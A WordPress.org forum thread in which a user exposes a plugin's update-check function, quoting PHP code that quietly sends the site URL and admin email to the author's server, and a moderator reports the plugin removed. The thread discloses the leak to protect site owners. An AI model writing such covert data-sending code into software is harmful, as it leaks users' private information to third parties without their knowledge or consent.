WordPress.org

1. v-media
   Member
   Posted 6 months ago #

   In this function wbats_check_updates there is such code:

   $crlf = "\r\n";
     $host = 'josh-fowler.com';
     $handle = fsockopen($host, 80, $error, $err_message, 3);
     if (!$handle) {
       if ($echo) {
         echo __('Unable to get latest version', 'wbats')." ($err_message)";
       }
     } else {
       $req = 'GET http://'.$host.'/version/wbats.php?v='.urlencode(wbatsversion)
                . '&site='.urlencode(get_option('siteurl')).'&email='.urlencode(get_option('admin_email')).' HTTP/1.0' . $crlf
                . 'Host: '.$host. $crlf
                . $crlf;
       fwrite($handle, $req);
       while(!feof($handle))
         $response .= fread($handle, 1024);
       fclose($handle);

   It checks updates but also it sends your admin email to the author. In some days or weeks after installing this plugin you will get a spam email from the author, where he will promote his article rewriting service. And who knows what else he can do with your email. Sell to spammers?

   Please do not install this plugin unless you are completely sure in what you are doing.

   http://wordpress.org/extend/plugins/web-ninja-auto-tagging-system/

2. mmbee888
   Member
   Posted 6 months ago #

   thanks for the info.

3. Mark (podz)
   Support Maven
   Posted 6 months ago #

   Thanks - the plugin has been removed.

Reply

You must log in to post.